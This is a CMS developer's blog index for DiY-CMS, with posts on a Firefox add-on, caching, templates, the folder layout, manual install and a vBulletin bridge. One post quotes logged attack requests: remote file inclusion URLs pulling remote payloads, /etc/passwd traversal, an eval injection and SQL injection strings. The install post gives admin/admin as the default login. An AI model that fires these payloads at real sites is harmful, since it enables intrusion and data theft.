My first plug-in for firefox: Twitter Right-To-Left

  By: admin   tags Date Added: Thursday 24-02-2011


In the last couple of weeks I was busy reading about how to create a plug-in for Firefox. My intention was to create a plug-in that manipulates pages in a certain way to improve their look or add extra functionality. Then I came across Greasemonkey plug-in.

Greasemonkey plug-in allows you to write a JavaScript file and load it into the plug-in. The script file is specific to a certain website and adds modifications or improves the feel and look of that website.

So I started writing my plug-in for Firefox. Twitter is on the most popular social websites. Its users are from all over the world; however it provides limited user interface languages. The list provided does not include Arabic neither any Right-To-Left languages such Persian and Hebrew. My idea was to design the plug-in so I can modify the interface of twitter to shift the page direction from Left-To-Right to Right-To-Left and translates twitter page into Arabic.

Look at this example:



I finished the script but I did not like the idea of adding a file to the Greasemonkey plug-in since it is a hassle enough for the End-user to add a plug-in to the browser and set its configurations. Luckily I came across Greasemonkey compiler. The complier takes the "user script" (Greasemonkey term for the JS file) and converts it into a Firefox plug-in and Voila the plug-in is ready for Firefox.

You can download it through this link:
https://addons.mozilla.org/en-US/firefox/addon/twitterrtl/

The plug-in is compatible with Firefox versions: 3.0 to 4 beta.

Note: I am interested in translations into Persian and Hebrew so if you are capable of that please contact me on: info@diy-cms.com

You can follow me on twitter on this account:
http://twitter.com/khr2003

And you can get the latest DiY-CMS news on:
http://twitter.com/diycms


Tags: firefox-plugin, twitter, right-to-left, More details

New DiY-CMs features 2: adding code to templates and imporving update system

  By: admin   tags Date Added: Wednesday 09-02-2011

In my last blog I talked about the new updates that I developed for DiY-CMS. I talked about the cache system and in this blog I will be talking about the other two new improvements, namely: adding php code to main templates and improving the update system in the control panel.

One of the most needed features was to allow code to be inserted and parsed into templates of DiY-CMS themes. Adding code provides great flexibility for designing creating dynamic themes. I have changed the way that main templates are parsed within DiY-CMS. Eval() function is no longer used for parsing as it is frowned upon by many developers due to security risks it might poses as well as its inability to parse PHP code inside templates (in the case of DiY-CMS) without number of unnecessary modifications to the CMS.

So what is the benefit of enabling code parsing within main templates? The main advantage is that creating theme would be easier and more dynamic. For instance one could use condition statements (one of the common used statements in themes) to change a colour, a column or practically anything else. One can even add functions or any snippet of code he might like to the theme that he is creating. The second advantage is that I am working of developing theme settings in which this change comes in handy. Meaning that a designer would add settings to his theme, these settings can be modified by a general user through an interface and the designer will incorporate PHP code to modify the look and feel of the theme based on these settings.

Since now PHP code is accepted within main templates one can use the standard PHP file inclusion function rather than DiY-CMS style, for instance to include the file ‘blocks/tags.block.php’ instead of using:


<!--INC dir="blocks" file="tags.block.php" -->

One could use this style:

<?php include('blocks/ tags.block.php'); ?>

I have mentioned earlier that eval() function is no longer used, and that means that variables inside the main templates will not be rendered correctly (variables are the words preceded by the dollar sing $). For example $index_middle will not render correctly and it needs to be enclosed by php tags like so:

<?php echo $index_middle; ?>

I have updated all the themes in the download center to conform to the new system, and – hopefully – you would not have problems installing or running them on your website.
The second update I will be taking about in this blog is the improvement of the update system in the control panel. I have made number of improvements to the underlying code of the system and modified it to retrieve data in JSON format from DiY-CMS official website. This will allow for a more efficient and smooth process of updates. Also I improved the system to accept ZIP files. Using this feature the website administrator would be able to install a bunch of updates in one click. In order for this feature to work you need the ZIP Library installed on your hosting server. It is mostly installed, but if it is not you can ask your hosting to install it for you.
I wish that these features would be in great help for all the user of DiY-CMS, and I hope to hear your opinions in the comments.


Tags: updates, features, php-code More details

New DiY-CMs features 1: reducing queries by 50-85%

  By: admin   tags Date Added: Wednesday 09-02-2011

After I finished programming my first app for facebook - Friends Stat, I started thinking about new ways to improve DiY-CMS. I have many ideas to develop but there are three features of them which I believe are important. They are: cache system to minimise mysql queries, adding php code into main templates and improving the update system in DiY-CMS control panel.

I will explain the first feature in this blog and then talk about the rest in later blogs.
Cache system is developed to ease the process of retrieving data from database. In other words cache system saves the results of repetitive queries that do not change often into files and then retrieve the data from these files rather that querying database again and again. As you might have guessed by now, this process will reduce the load on database and increase the cms performance.

In DiY-CMS there are number of queries that do not change often such as general settings, module settings, plugins details, themes, templates and other queries. Cache system will save the results of each one of these queries to a single file and place it in cache folder. Once a query is requested in the front-end DiY-CMS will check if there is a cache file relevant to that query and retrieve results saved in it, otherwise the query will run normally.

Cache files do not have expiry data, so files would remain for unlimited period of time. What if I make changes to settings, theme or templates? In this case the relevant cache file would be updated automatically once changes occur in the control panel. Also, you can remove cache files manually from Cache folder any time you whish and DiY-CMS will create new cache files.

This feature reduces mysql queries and therefore increases overall performance. In some pages of DiY-CMS queries reached as little as 1 query per page. Certainly the number of queries cached would be different from module to another and one page to other pages but on average mysql queries have been minimised by 50-85%. See chart below.



Furthermore, you can use this system to cache queries that you might use in modules, plugins or blocks you develop for DiY-CMS. Implementing cache is easy and requires three functions one to create the cache file, second one to check file existence.

Say we have this query that we want to cache:

$result = $diy_db->query("SELECT variable,value FROM diy_settings");


You would be place this code in the place where the data of diy_settings is updated:

// Query database table
while ($row = $diy_db->dbarray($query_result)) {
$key = $row['variable'];
$array[$key] = $row['value'];
}

// create a cache file and save data into it
$diy_db->create_query_cache_file('global_settings', $array);


Notice that create_query_cache_file() function takes two parameters, the first one is the file name and the second one is query data that needs to be cached.

Then you would use this code to check for the file and retrieve its data:

// check if file exists
$cahce = $diy_db->check_query_cache_file('global_settings');
if ($cahce) {
// if file exists retrieve its data and place them in a varaible
$array = $diy_db->get_query_cache_file('global_settings');
} else {
// if file does not exist proceed with query as normal
$result = $diy_db->query("SELECT variable,value FROM diy_settings");

while ($row = $diy_db->dbarray($result, $i++)) {
$key = $row['variable'];
$array[$key] = $row['value'];
}
}
// here $array data can be used as whished


In the last code snippet there are two important functions, the first one is check_query_cache_file() which checked if file exists and the second retrieve data from the cache file. Both functions take one parameter and it is the file name that we creates using create_query_cache_file() fcuntion.

I hope that this blog provides some insights into the feature of DiY-CMS and how to use them.

In next blog I will explain the rest of features.


Tags: updates-diy-cms-mysql More details

Learning the structure of DiY-CMS folders and file - Part 3

  By: admin   tags Date Added: Tuesday 09-11-2010

This is the third post that is directed to the developers more than the end user. In this post I will talk about the files in the “includes” folder in the root DiY-CMS directory. Knowing the task of each file will assist the developer to understand the architecture of DiY-CMS and data flow as well.




Includes folder contains the files responsible for the main tasks to run DiY-CMS and control the different aspect of the CMS.

Here is the list of folders and files:
PHPMailer folder: This folder contains the folders and file of popular mail program PHPMailer. It is the standard program in DiY-CMS to send emails for notifications or other uses.

bbcode.class.php: This file contains the class that handles bbcode format.

blocks.class.php: This file handles the arrangement of blocks (menus) in DiY-CMS view.

date_conversion.class.php: handles date conversion in DiY-CMS. It converts Gregorian date to Hijri (Islamic lunar) date and vice-versa.

email.class.php: This class utilises the functions of PHPMailer and group in one class to ease its use.

files.class.php: This class handles files read and write functions.

form.class.php: This file contains the functions needed to produce a form with different fields, such as creating an input field or textarea.

general.functions.php: This file contains general functions like functions handling page header, page footer, errors or message display.

hooks.functions.php: This file handles hooks management in DiY-CMS. You can use it to place a hook in a certain place in the module or plug-in you develop. Alternatively, you can use it to hook your functions to the built-in hooks in DiY-CMS. (I will explain how hooks work in detail in a future post).

keyword_generator.class.php: This class is used to generate keyword on the fly for posts in DiY-CMS. It increases posts’ friendliness to search-engine.

login.class.php: This file controls users’ authentication in DiY-CMS.

module.class.php: This file is responsible for module management. It checks for module’s status, loads its templates, load its settings and run the module.

mysql.class.php: This file contains the necessary functions that manage database connection, querying, database error handling.

plugins.class.php: This file handles plug-in management. It loads all the active plug-ins, load settings, load permissions and then run plug-ins.

post.functions.php: This file contains post-related functions. They include post sanitisation, preventing sql injections, check required fields and other functions.

protection.php: This file mainly prevents XSS attacks on DiY-CMS.

session.class.php: This class handles sessions.

spam.class.php: This class prevent post spamming in DiY-CMS, by checking IP address and time intervals between two consecutive posts of the same user.

templae.class.php: This class handles theme-related task. It check for the theme selected, load its templates, process their content and then output the page.

upload.class.php: This class handles file uplads in DiY-CMS. It can handle adding or editing multiple files at the same time.

I hope you liked this post, and looking forward to hear your comments and suggestions.


Tags: DiY-CMS-structure More details

Yeah! Preventing more than 3000 hacking attempts

  By: admin   tags Date Added: Wednesday 03-11-2010

Security is one of most important criteria in any script one would like to use. In this post I will talk about the security in DiY-CMS. DiY-CMS has the ability to prevent and record most hacking attempts.
Since April 11th http://www.diy-cms.com has prevented more than 3000 hacking attempts in both the English and the Arabic sections. Bear in mind that these are only the recorded attempts, SQL injection through forms, for example, are prevented but not recorded for number of reasons.

Attempts example:
Several methods were used to hack into the DiY-CMS, they include remote file inclusion, sql injection and attempt to access root folders and files.
Here are few examples:

Remote file inclusion (I replaced original site names with SITE-NAME):

/mod.php?mod=http://www. SITE-NAME.com.mx/admin/xroot.txt?
/?path=http://stul. SITE-NAME.cz/img/.jancuk/injek.txt??

/mod.php?mod=download&modfile=view_file&downid=1%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://nic. SITE-NAME.edu.cn/media/j1.txt???

/index.php//openi-admin/base/fileloader.php?config[openi_dir]=http://SITE-NAME.co.kr/poll/aipi/id.txt??

/index.php//cms/system/openengine.php?oe_classpath=http://SITE-NAME.org/Scripts/bogel/id1.txt????

/mod.php?mod=http://SITE-NAME.com/admin/images/index.txt?


Accessing root files and folders:
//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00

/mod.php?mod=../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/htdocs
/cgi-bin/logs
/cgi-bin/root

/mod.php?mod=http://jmbioanalises.com.br/Lims/images/g.txt?



SQL injection:
 /mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=27%20AND%20ascii(substring((SELECT%20distinct%20table_name%20FROM%20information_schema.tables%20Where%20table_schema=0x202020%20limit%2019,1),3,1))

/mod.php?mod=blog&modfile=index&page=2&start=10%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*%20and%201=1


Geographic locations:
Attempts were initiated from more than 50 countries. Here is a graph of the top 6 countries where attempts originated from:



And here is a full list of countries where attempts originated from with the number of attempts:
Brazil => 52
United States => 52
Republic of Korea => 13
Saudi Arabia => 12
Germany => 7
United Kingdom => 7
Oman => 6
Morocco => 6
Algeria => 5
Palestinian Territory => 5
France => 5
Italy => 5
Turkey => 5
Indonesia => 4
Canada => 4
Netherlands => 4
Australia => 4
Russian Federation => 4
Belgium => 3
Kuwait => 3
Bulgaria => 3
Hungary => 3
Iraq => 2
Islamic Republic of Iran => 2
Czech Republic => 2
Poland => 2
Bahamas => 2
Austria => 2
Malaysia => 2
Japan => 2
Slovakia => 1
Ukraine => 1
South Africa => 1
Norway => 1
Belarus => 1
Argentina => 1
Azerbaijan => 1
Peru => 1
Bahrain => 1
Egypt => 1
Denmark => 1
Israel => 1
Thailand => 1
Syrian Arab Republic => 1
Latvia => 1
Martinique => 1
India => 1
Libyan Arab Jamahiriya => 1
Europe => 1
Mexico => 1
Greece => 1
Tunisia => 1


I hope that this post explains how powerful DiY-CMS when it comes to security and preventing hacking attempts, and I will always add more security measures to it.

If you want to check the types of hacking attempts your site is getting you can check “html/bugs.txt” file for the list of all hacking attempts.


Tags: prevent-hacking- More details

Learning the structure of DiY-CMS folders and file - Part 2

  By: admin   tags Date Added: Sunday 31-10-2010

In last post I explained the task that each file in the root directory handles. In this post, I will keep on explaining the rest of folders in the root directory.



Admin folder: This folder contains the folders and files that are responsible for the administration part of DiY-CMS. It contains four folders and a number of files.

admin_classes folder: contains files essential PHP classes to run the administration area.

admin_lang folder: contains the language file for the UI of the administration panel.

admin_sections folder: contains the folders responsible for the different administration sections (the menus to the left of the administration panel) , such as managing modules, themes .. etc.

admin_skin folder: contains the skin or themes for the administration panel.

conf.php: contains the values required for database connection, folders location, site administration contact details and some other values.

index.php: runs the main view of the DiY-CMS admin panel.

global.php: Global file for DiY-CMS panel area, it must be included in all files in the admin area.
sections.php: Manages sections view and management in the admin panel.


Blocks folder: This folder includes all the blocks (or menus) designed for DiY-CMS.

Html folder: Contains files required the included WYSIWYG editor in DiY-CMS.

Images folder: Includes images that used are used globally across DiY-CMS.

Includes folder: contains the necessary PHP classes to run DiY-CMS such as database connection, themes management, module control and other functionality. (I will explain the tasks that each files handle in a future tutorial).

Install folder: This folder is responsible for running the installation wizard when using DiY-CMS for the first time at your server. If installation is complete the folder name will be changed for security reasons.

Lang folder: Contains the languages files for DiY-CMS interface.

Modules folder: Contains modules folders.

Plugins folder: Contains DiY-CMS plug-ins folders and files.

Themes folder: Contains DiY-CMS themes.

Upload folder: This folder is used for file upload. It should be the only place for file upload. This will make data transfer or upgrade easier for the end-user.

Please let me know if there are any part of this tutorial needs to be further explained.


Tags: DiY-CMS-structure More details

Learning the structure of DiY-CMS folders and file - Part 1

  By: admin   tags Date Added: Wednesday 20-10-2010

When I created DiY-CMS I made number of tutorials explaining how to manage and use DiY-CMS. Those tutorials were tailored the general user of CMS, a user who has no or little programming knowledge. Since that series of tutorials is complete, I will be starting another series; a one that is made specifically for developers who whish to develop DiY-CMS to create modules or plug-ins for DiY-CMS, or modify in any way they wish. In basic, this tutorials series is mainly for developers with sound programming language knowledge.

I will start explaining the general structure of folders and files of DiY-CMS. Then I will write number of tutorials detailing the best way to program a plug-in. I will then explain how to program a module and the best practices that one should use for programming.

In this tutorial I will start with the first part of explain the folders and files structure of DiY-CMS. I will explore the folders one by one and explain the files they contain and their main functions.

Once you download DiY-CMS and extract the zipped file, your will find a structure similar to this:



In the first part I will explain what each file in the root folder does then I will explain the function of the rest of the folders and files in the second part.

.htaccess: contains information about url re-write.

control.php: provides a user interface to manage modules from one place.

filemanager.php: renders image files, particularly avatar, thumb images and can be used to render any kind of image.

global.php: This file is a global file, meaning that it must be included in all files of DiY-CMS. It manages the inclusion of the necessary files to run DiY-CMS, such as files responsible for database connection, theme selection or user authorisation. By default all modules have this file included, so you do not have to include it in any module file you would like to program.

index.php: this the index file of DiY-CMS. It displays the first page of DiY-CMS to the user.
licence.txt : the licence of DiY-CMS. Since DiY-CMS is an open-source program, (GNU GENERAL PUBLIC LICENSE) GPL licence is used.

mod.php: this file manage DiY-CMS modules display. It is responsible for reading the general layout of any opened module.

online.php: retrieve the number of people online and their location in the DiY-CMS.

robots.txt: communicates with search engine crawlers and tells them which part of DiY-CMS to access and not to access.

In the second part of this tutorial I will explore the contents of admin folder.


Tags: file-structure, diy-cms More details

How to install DiY-CMS manually

  By: admin   tags Date Added: Thursday 14-10-2010

If you ever ran into an issue during the installation process of diy-cms this blog will solve your problems using the good old manual way. In this blog I will explain how to install DiY-CMS on the local server on your website manually and without the built-in installation wizard.


First of all we need to create a database using phpMyAdmin. Open phpmyadmin and then create a database as shown in image 1 below. Make sure that you select the utf-8 encoding to both database encoding and connection collation. This is to ensure that DiY-CMS will function correctly when displaying non-English characters or using a different language such as Arabic, Hebrew, Chinese or other languages.


Image 1



Second step: click on import at the top of the page. Then import this file “install/install.sql” to the database as shown in image 2.



Image 2




Third step: Remove install folder from the DiY-CMS folder.

Forth Step: open file “admin/conf.php” and replace the values between the curly brackets {} (along with the {} themselves} with the appropriate values:

$CONF['dbname'] = "{server_db}"; // Database name
$CONF['dbuser'] = "{server_un}"; // Database user
$CONF['dbpword'] = "{server_pass}"; // Database password

$CONF['site_path'] = "{path}"; // Path to your site
$CONF['upload_path'] = "{uppath}"; // Path to the upload folder
$CONF['site_url'] = '{sitelink}'; // website URL
$CONF['site_mail'] = "{sitemail}"; // Website Email
$CONF['site_title'] = "{sitetitle}"; // Website Title
$CONF['cookie_domain'] = '{domain}'; // Website URL


Final Step: At this stage you would be able to login to your website using these credentials:
Username: admin
Password: admin

Change your password to whatever you want then customize the CMS to your needs.

I hope this tutorial was useful.


Tags: install, manual More details

Finally, a DiY-CMS / vBulletin bridge

  By: admin   tags Date Added: Friday 24-09-2010



Finally, I was able to create a bridge between DiY-CMS and vBulletin forum. I designed the bridge in the form of a plug-in so it is easir for adminisitrators to control it. The plugin would unify registration and login in DiY-CMS and vBulletin forums.

The plguin will:
1- Unify registration. User would have to register once using the same registration form.
2- Unify login, through DiY-CMS only.
3- Unify logout, through DiY-CMS only.
4- Import users who registered through vBulletin forms.

Installation:
1- Download plug-in from this link: http://www.diy-cms.com/mod.php?mod=download&amp;modfile=view_file&amp;downid=30

2- Extract the contents of the zip file and then upload the folder to the plugins folder in your website.

3- Open config.php inside the plug-in folder and edit this line:
define('FORUMPATH', 'D:/xampp/htdocs/vb/'); // path to your forum 


Change D:/xampp/htdocs/vb/ to the path of vBulltein forums on your website.

4- Install the plug-in through the admin panel. In the plug-in setup tick users module only. You can select other modules, however this will increase the database enquires number and the plug-in is programmed to be working only on the users module (since that is all it needs to function correctly)

5- In the plug-in settings you will see the following:



Select the new users group. Link DiY-CMS groups to the corresponding vBulltein forum groups.

Import users to DiY-CMS by clicking on the green button. You have to repeat the last step (the importing part) from time to time in order to import users who users who register through vBulltein.

Alternatively you can disable registration at the vbulletin and enable it only through DiY-CMS


Tags: vbulltein-bridge, diy-cms More details

Blog module for DiY-CMS

  By: admin   tags Date Added: Tuesday 31-08-2010


Hi
As promised, I made the blog module available for download. This website is a live example of the blog module.

Module features:
- Unlimited categories and subcategories.
- Groups-based permissions for adding and editing posts.
- ability to add tags to blogs.
- and many more.

to download the module:
http://www.diy-cms.com/download/view_file/downid_27


Tags: blog, module, diy-cms More details

Pages
 1 
2 3 > »